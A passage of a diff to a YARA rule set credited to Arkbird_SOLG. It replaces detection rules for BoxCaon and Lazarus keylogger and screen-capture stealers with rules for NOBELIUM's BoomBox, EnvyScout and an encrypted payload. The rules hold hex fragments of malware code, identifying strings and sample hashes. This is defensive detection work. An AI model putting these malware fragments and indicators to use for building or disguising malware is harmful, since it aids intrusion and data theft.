8d 85 4c f2 ff ff 50 }
-		$s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 }
-		$s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b }
-		$s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 }
-		$s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 }
+		$s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b }
+		$s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff }
+		$s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the BoxCaon malware"
+		description = "Detect BoomBox malware"
 		author = "Arkbird_SOLG"
-		id = "5f456b73-02f9-5dd7-973e-bde20dcddd27"
-		date = "2021-07-01"
-		modified = "2021-07-02"
-		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22"
+		id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578"
+		date = "2021-05-28"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc"
+		logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
-		hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2"
+		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
+		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
 		tlp = "White"
-		adversary = "IndigoZebra"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d }
-		$s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d }
-		$s3 = "api.dropboxapi.com" fullword ascii
-		$s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 }
-		$s5 = "C:\\Users\\Public\\%d\\" fullword ascii
-		$s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d }
-		$s7 = { 25 73 2f [1-4] 2e 74 78 74 }
-		$s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 }
+		$s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a }
+		$s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a }
+		$s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a }
+		$s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect ScreenCapture malware used by Lazarus APT"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "bb0463ac-6219-5a12-b3d2-fc82800bda69"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31"
+		description = "Detect EnvyScout downloader"
+		author = "Arkbird_SOLG"
+		id = "645f60d1-7c95-515c-a88e-d8528cf8b644"
+		date = "2021-05-28"
+		modified = "2021-06-02"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756"
+		logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
+		hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11"
+		hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii
-		$s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii
-		$s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii
-		$s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii
-		$s5 = "Capturing screen...\n" fullword ascii
-		$s6 = "%s\\P%02d%lu.tmp" fullword ascii
-		$s7 = "ScreenCaptureThread finished!" fullword ascii
-		$s8 = "ScreenCaptureThread started!" fullword ascii
-		$s9 = "ScreenCapture start time set to %llu" fullword ascii
-		$s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii
-		$s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s14 = "[END] ScreenCaptureThread terminated!" fullword ascii
-		$s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s17 = "Entered Windows direcotry, skipping..." fullword ascii
-		$s18 = "Found %d entries." fullword ascii
+		$s1 = "==typeof window&&window.window===window?window:" fullword ascii
+		$s2 = "==typeof self&&self.self===self?self:" fullword ascii
+		$s3 = "0===t?t={autoBom:!1}:" fullword ascii
+		$s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii
+		$s5 = "navigator.userAgent" fullword ascii
+		$s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 14 of them
+		filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect keylog malware used by Lazarus APT"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58"
+		description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header"
+		author = "Arkbird_SOLG"
+		id = "34da1d06-7892-59ec-8b11-c3278a7f2e34"
+		date = "2021-05-28"
+		modified = "2021-06-02"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa"
-		score = 75
+		logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
+		hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f"
+		hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb"
+		level = "Experimental"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii
-		$s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii
-		$s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii
-		$s4 = "Key Log Mutex already created! %s\n" fullword ascii
-		$s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii
-		$s6 = "KeyLogThread finished!" fullword ascii
-		$s7 = "KeyLogThread started!" fullword ascii
-		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s11 = "[END] KeyLogThread terminated!" fullword ascii
-		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
-		$s15 = "Found %d entries." fullword ascii
